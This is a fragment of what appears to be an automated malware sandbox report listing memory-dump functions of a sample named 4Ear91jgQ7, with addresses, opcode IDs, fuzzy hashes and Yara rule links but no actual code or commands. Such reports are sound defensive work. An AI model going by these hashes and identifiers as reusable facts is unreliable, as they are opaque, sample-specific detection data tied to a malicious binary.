                                                              • Instruction Fuzzy Hash: F3D05E35B000148FAB4497A8E4255F97BA4DB8921138480E3E206CB361C731D8114BC0
                                                              Function 064D8B6D Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a74aed3c872a109884209cabc0d7f3b5ab1c11b7ef366c71f616fcfab2acacdf
                                                              • Instruction ID: e0fdb4e40e459e34f7a6860d4877d863a396e5489851995cf2162e7f59efaeb8
                                                              • Opcode Fuzzy Hash: a74aed3c872a109884209cabc0d7f3b5ab1c11b7ef366c71f616fcfab2acacdf
                                                              • Instruction Fuzzy Hash: C9D05E74B101188FAB88DAA8E4259F93B68DB8922574440E3E206CB3A1C721D8014BC0
                                                              Function 064D8DBA Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24e1e99b6ad1510abbb6fd75b333c1de44d391f1ad6d273db9edd6e081bf6590
                                                              • Instruction ID: f71b9dfdd02e2b2cba39b3cf6289a5008cea624bf0855da1a32f0c2d76d6c374
                                                              • Opcode Fuzzy Hash: 24e1e99b6ad1510abbb6fd75b333c1de44d391f1ad6d273db9edd6e081bf6590
                                                              • Instruction Fuzzy Hash: 57D05E38B000148FAB48A6A8E4259F93B65DB9961134000E3E206CB3A0CB2198014B80
                                                              Function 06476641 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 236c08bf3f0f9a39be54f74c7af71668f8e8901378f5efe34be7f49c738bc49d
                                                              • Instruction ID: f79dd3fd0a24c06a8eb8abb05de0d44f65e2ee28913f7d986bfbeed80f5b5883
                                                              • Opcode Fuzzy Hash: 236c08bf3f0f9a39be54f74c7af71668f8e8901378f5efe34be7f49c738bc49d
                                                              • Instruction Fuzzy Hash: 21D0C93911A2945FC3515B289844C927FBCEA0A56432650C2F589CB223C514A80686B1
                                                              Function 0647667F Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f558108c9f971f16e9a1736a470dac12652eb1b6b48f9862d6c08254ab8f048
                                                              • Instruction ID: c1b9da7db61e0378eb9afd71474f65b98b6ae2cd1653d2b5af70e198347ec9a4
                                                              • Opcode Fuzzy Hash: 6f558108c9f971f16e9a1736a470dac12652eb1b6b48f9862d6c08254ab8f048
                                                              • Instruction Fuzzy Hash: C8D0A92060F2B02B831212283C104D32FA98A8689031601D3F9C5CA207C0280D0A83F2
                                                              Function 0647C070 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6883171a734b81f831cfbd3972cd3c2959651c1ef7ce4481ba32ed39e10ba46
                                                              • Instruction ID: 2ced2d62d18dcce87b5cb1692fcbc58a8ab1c637d7b81844c663d7114523c423
                                                              • Opcode Fuzzy Hash: b6883171a734b81f831cfbd3972cd3c2959651c1ef7ce4481ba32ed39e10ba46
                                                              • Instruction Fuzzy Hash: 6CD0121810A3702FDE063222191A5AA2F26EB475D33150196F4C78BAC2D9554D0BC7B1
                                                              Function 06472CE0 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d8be11bea84a4e0d5761b9df62b2846ecbfdc393b0edcfcb6a2cbac4d7d3d64
                                                              • Instruction ID: db5f9c0cbb3e0580f4f83df3912ecc9d9b68583ea81cd6442f5a098fc258ec9e
                                                              • Opcode Fuzzy Hash: 2d8be11bea84a4e0d5761b9df62b2846ecbfdc393b0edcfcb6a2cbac4d7d3d64
                                                              • Instruction Fuzzy Hash: 45D012655562C02FFA02621068209B72B19E7C334FB3050E6E1D7DF245C5189C0343B2
                                                              Function 06472D07 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8b5222d97b5d49fe154270e94a3314a2ed2e6aecf68005a89400637dcfc923bf
                                                              • Instruction ID: 4e1d2527b977d51e0090c46c581d9d3c83443d5da178435cae192eca2e0b4b2f
                                                              • Opcode Fuzzy Hash: 8b5222d97b5d49fe154270e94a3314a2ed2e6aecf68005a89400637dcfc923bf
                                                              • Instruction Fuzzy Hash: 60D0223008A3882FC7022B2068108B13F3ECB421053D001C2B18A8B113C8180D4A83A2
                                                              Function 0641E976 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 546964bdcc28ce044b54bc5e0813b59b33eb9c6f9e7a7cfbd6c45c72dfa956df
                                                              • Instruction ID: 6cc545f1dd475339fc8d75c7b09d7a4d05e6c4a740c8906b28a89675b137af83
                                                              • Opcode Fuzzy Hash: 546964bdcc28ce044b54bc5e0813b59b33eb9c6f9e7a7cfbd6c45c72dfa956df
                                                              • Instruction Fuzzy Hash: A9D02B3314C18846F745961074923A93FF1EF93130B28405ACC800C4C6C345501B8B10
                                                              Function 0647E350 Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e2693eb9bba1aec2ff8c43cf9adf83633f1bd06258ee096f70ca0d150e85a2f
                                                              • Instruction ID: 8f8701075fc99d86a6024573a75f2c8496c014a652dca5a17e1076fb01ebcb6f
                                                              • Opcode Fuzzy Hash: 3e2693eb9bba1aec2ff8c43cf9adf83633f1bd06258ee096f70ca0d150e85a2f
                                                              • Instruction Fuzzy Hash: 9AD09234488114CFA3C86BE2B59D4F83B7ABB4039274006A7F20BE0C21CB2198138AF6
                                                              Function 064730E0 Relevance: .0, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a7aec84c2217e9a665a86bcd6cb93da5ccdadf104a9742ae5e0a6601ecc75ab9
                                                              • Instruction ID: 0c5cc18f3a04d5ae42258556cbfeade43db5e4c986804765b85160c465311f52
                                                              • Opcode Fuzzy Hash: a7aec84c2217e9a665a86bcd6cb93da5ccdadf104a9742ae5e0a6601ecc75ab9
                                                              • Instruction Fuzzy Hash: D7C0123400E2907FD71206500D11DE67F65FB81341B259142B2818409242680D5283B3
                                                              Function 06472C20 Relevance: .0, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 912331fcb8eeb19b4349f6422dd96246eba95c08706d5384ad8d5f4f26ea2252
                                                              • Instruction ID: a08c186102d92f9dbd1a8bb5406429e2d666b17344981589b084b7ef4b92cecf
                                                              • Opcode Fuzzy Hash: 912331fcb8eeb19b4349f6422dd96246eba95c08706d5384ad8d5f4f26ea2252
                                                              • Instruction Fuzzy Hash: E7C0122890A2803EEB1212304D29BF22F65D7C2282F24E582E1928409789280C0382A2
                                                              Function 064D880C Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a497849d61d91803e3c99e5f9b6496547f50a42fc39cf5e8cdc8d66e9ca48a74
                                                              • Instruction ID: cdedd67fb9776ea2c2ed72891144c43c37830248d581e3c05ad799f8b66f6c0b
                                                              • Opcode Fuzzy Hash: a497849d61d91803e3c99e5f9b6496547f50a42fc39cf5e8cdc8d66e9ca48a74
                                                              • Instruction Fuzzy Hash: 54D0C979B000148F9B84DBADE06549C7BF5EF88215B4000B6E20ACB261DB309C128B81
                                                              Function 064760F2 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae56028d6b80f90856b83ecbc35d3cccfe4c4b7dbf9205837cac606e06021f8b
                                                              • Instruction ID: dc5c6053d8044bab2a45431eb8181699b242c3c062ad1e1c01513368c11c0419
                                                              • Opcode Fuzzy Hash: ae56028d6b80f90856b83ecbc35d3cccfe4c4b7dbf9205837cac606e06021f8b
                                                              • Instruction Fuzzy Hash: 0CD0123001A2545FC31297649828D967F74DE0627431950C2F68C8B133D5149804CBE1
                                                              Function 06413DA2 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16dff12e7b335b107d36b40e90e7573ca3092085c65b07ca2ee81b87f88a8349
                                                              • Instruction ID: e3e6b89812e7ed49ee2e254feba1b87c3482e0dbc7f01afbca57081cdf7f3706
                                                              • Opcode Fuzzy Hash: 16dff12e7b335b107d36b40e90e7573ca3092085c65b07ca2ee81b87f88a8349
                                                              • Instruction Fuzzy Hash: ADC0123524A3802FD30307208E00A927E2A8F43A12B0A0286B2958A0A3C6361865C3B3
                                                              Function 064D8A74 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b26e54ebdaa796abfe70a92af2b8559a86902e8ac9d1739301a8e0aa23e1ce29
                                                              • Instruction ID: 9ab25c13cb4002e8ef92f47ae21dcdb2b3fa863b54833e6d73f5bf2329a972c6
                                                              • Opcode Fuzzy Hash: b26e54ebdaa796abfe70a92af2b8559a86902e8ac9d1739301a8e0aa23e1ce29
                                                              • Instruction Fuzzy Hash: C6D012357400108F9748DA9DD02449C7BE5DFC421574000F6E206CB671CB309C51C7C1
                                                              Function 064D8930 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd1421b7761fc6d858ef25fb996adcb05b25c3846822fb6287b26a4738af49cd
                                                              • Instruction ID: bd654778d95f40c148a31c147c3ccad717bca516c469f408ed413347515cb759
                                                              • Opcode Fuzzy Hash: cd1421b7761fc6d858ef25fb996adcb05b25c3846822fb6287b26a4738af49cd
                                                              • Instruction Fuzzy Hash: F9D012357000148F9748D7ACE06549C7FE6DFC421575140B6E20ACB265CB31ED114B81
                                                              Function 064D89D2 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5aae895c3fd0421796350ac7bc1d0650fca2a9b2b90e59c0b6cd3cf2f3be3273
                                                              • Instruction ID: c36c3f5726f6656885eb62a46ad83f6b096f28fa4177ef7ec56b223efb85cbaa
                                                              • Opcode Fuzzy Hash: 5aae895c3fd0421796350ac7bc1d0650fca2a9b2b90e59c0b6cd3cf2f3be3273
                                                              • Instruction Fuzzy Hash: C6D01235710010CF9788DA9CD02589C77AAEFC461574004F6E306CB265CB309C114781
                                                              Function 0641EB40 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 81de167f9b5b78dacfb49e590f351d9a93016392d98d37c80cecc026ebc6914e
                                                              • Instruction ID: f6eda986f21202120525e293b397d284d0c7c794aae8966c947c70e204999757
                                                              • Opcode Fuzzy Hash: 81de167f9b5b78dacfb49e590f351d9a93016392d98d37c80cecc026ebc6914e
                                                              • Instruction Fuzzy Hash: A4D0A938A18210CE9BFA4A18840887B7DBAAE44162B10820BDCA74E2C1C73048028A82
                                                              Function 064DF5BE Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e15f39636d05196a347b27f182a9a9b6bdf1f19f2d28ce1a0f26a6dce54db2e6
                                                              • Instruction ID: 93e743439ddd64fa9cdb4fb273db4d93c3d44ea218f49e1eb2d4409240ec7931
                                                              • Opcode Fuzzy Hash: e15f39636d05196a347b27f182a9a9b6bdf1f19f2d28ce1a0f26a6dce54db2e6
                                                              • Instruction Fuzzy Hash: 9AC08CA2E1100CDBD7A00E00A82939437A4F72221AF048342E80B400005331041B8581
                                                              Function 06476650 Relevance: .0, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                              • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                                                              • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                              • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40
                                                              Function 06476100 Relevance: .0, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                              • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                                                              • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                              • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40
                                                              Function 06472D18 Relevance: .0, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21915217378c54f85af50050f373a20c0dd2d8fcf63ed2f5c42d894a1c667072
                                                              • Instruction ID: fb38806d1f7c21810b8084fa860994ad6a7ff5cfca42252222c968122bbe1f2b
                                                              • Opcode Fuzzy Hash: 21915217378c54f85af50050f373a20c0dd2d8fcf63ed2f5c42d894a1c667072
                                                              • Instruction Fuzzy Hash: A0B01270080A0D4BCA417B54F409A483B6DDB402057D04510B10C0661A99A828944689
                                                              Function 064D94E8 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3138adf0bfdd48e2762c986fa9993d0817edc4c5b6378c5b2c5c0e70dd92d592
                                                              • Instruction ID: 6637d22843f6e8883db60f0bc3075c5a51bd336bcf7e153e1ed53dbf95891a07
                                                              • Opcode Fuzzy Hash: 3138adf0bfdd48e2762c986fa9993d0817edc4c5b6378c5b2c5c0e70dd92d592
                                                              • Instruction Fuzzy Hash: 8DC09231502240CFCB16CF30D0488107B76AF4230535A80D8E0098F662C732DD82CB10
                                                              Function 064DF60A Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02cb0da82850bc599ea20619564ea7ed9c7148473806617de7d5faba8ebd265a
                                                              • Instruction ID: dfbdc0a16d15c40b86dac51d487e6eb2dabd82d18eebfeb967d14e69a2c016af
                                                              • Opcode Fuzzy Hash: 02cb0da82850bc599ea20619564ea7ed9c7148473806617de7d5faba8ebd265a
                                                              • Instruction Fuzzy Hash: 2CA02230808008CB2BA0C820320803833A0C20000A30003C2FC0F80E008A320A2B0AC0
                                                              Function 064DF632 Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08ccd8eba739f3b60567e7cd88742d04344ca89b6fa553fb89195f969c8fc1f9
                                                              • Instruction ID: 6396ef2d8ce708f66f4a86c30ab421eeda53789803117780cf74ca202c7eb9f3
                                                              • Opcode Fuzzy Hash: 08ccd8eba739f3b60567e7cd88742d04344ca89b6fa553fb89195f969c8fc1f9
                                                              • Instruction Fuzzy Hash: 9EA02230888008CB2BA08800300C038B3A0C30020230023C2FC0F80E808A32082B0BC0
                                                              Function 064DF5EA Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af43cc5c4d80cda387b2094c14239d5e62248ee6c1193c2d696429300fdbd66f
                                                              • Instruction ID: 8f04917f99a96193a8014a379af0a9bffa793b1fcb02e1af7b6b8b9db4ee5203
                                                              • Opcode Fuzzy Hash: af43cc5c4d80cda387b2094c14239d5e62248ee6c1193c2d696429300fdbd66f
                                                              • Instruction Fuzzy Hash: FBA02232888008CB2BA0C800300803833A0C28002A30003C2FC0F80E008A32082B0AC0

                                                              Non-executed Functions

                                                              Function 064A3018 Relevance: 6.1, Strings: 4, Instructions: 1118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xgq$Xgq$Xgq$Xgq
                                                              • API String ID: 0-1951159037
                                                              • Opcode ID: 8b66f39d5921a6724f5b0803ab61f1a61bdd3a6234931f1eb3e7f13cd81c3791
                                                              • Instruction ID: 642c399e516f02e1e3b25cd23e798e1df222757eacd715082903b8037f77194c
                                                              • Opcode Fuzzy Hash: 8b66f39d5921a6724f5b0803ab61f1a61bdd3a6234931f1eb3e7f13cd81c3791
                                                              • Instruction Fuzzy Hash: 14426921663D917EBB218B504C10EF7BB6AFBD2358786EC86F8929E10196304C4F97F5
                                                              Function 06475810 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %
                                                              • API String ID: 0-2567322570
                                                              • Opcode ID: fb5df7301153149c661ba9fd0227e73b3fe2cd88853a94024900c61e003987bd
                                                              • Instruction ID: d3fbae9ab79f6ad4df08274e95c24236a5b6bc4e2ace831ee08230fd9b9aca94
                                                              • Opcode Fuzzy Hash: fb5df7301153149c661ba9fd0227e73b3fe2cd88853a94024900c61e003987bd
                                                              • Instruction Fuzzy Hash: E2026F74A00218CFDB99DFA5C8546AEBBB2FF88300F10842ED5169F395DB71D946CB90
                                                              Function 064D0040 Relevance: 1.3, Instructions: 1252COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 317490f131ad5570f44011a5099bea6a448ddbc148e74dbe2d9ce0e0ba099806
                                                              • Instruction ID: 8c272d3469084a778a3cd60db17c35221f605c64935bf3c8c7d78c16c8401472
                                                              • Opcode Fuzzy Hash: 317490f131ad5570f44011a5099bea6a448ddbc148e74dbe2d9ce0e0ba099806
                                                              • Instruction Fuzzy Hash: B9C20B34E00218CFDB65DF64C954AAEBBB2FF49305F1085AAD90AAB391D7719D81CF90
                                                              Function 064A3CC9 Relevance: .9, Instructions: 913COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 40795f871b85530209e3541be5991c742894ae47a404c2d68f148fba2fbf2b8d
                                                              • Instruction ID: d059a6db360707377fb190e74ab2c64292ca3203e3699f9fdd97dd04f9e3dcd4
                                                              • Opcode Fuzzy Hash: 40795f871b85530209e3541be5991c742894ae47a404c2d68f148fba2fbf2b8d
                                                              • Instruction Fuzzy Hash: 6F0212252A3C817EBB219B504C10EF7A75EFAE2399386ED86F8926E10055305C4FA7F5
                                                              Function 0641766A Relevance: .8, Instructions: 786COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e7b2c5c88de6d44caaafba938942818d5683b0cffd32c4dbc951e4852506aa6
                                                              • Instruction ID: 77008abc8c62679bb8f79fbdb8a4f1d30f2aa64382ec8a64dfcbdefc0fcb2add
                                                              • Opcode Fuzzy Hash: 8e7b2c5c88de6d44caaafba938942818d5683b0cffd32c4dbc951e4852506aa6
                                                              • Instruction Fuzzy Hash: 7C6272B07002009BE749DF18C55972A7AE6EF84308F65C46DD10E9F396CBBAD94B8BD1
                                                              Function 06417678 Relevance: .8, Instructions: 780COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
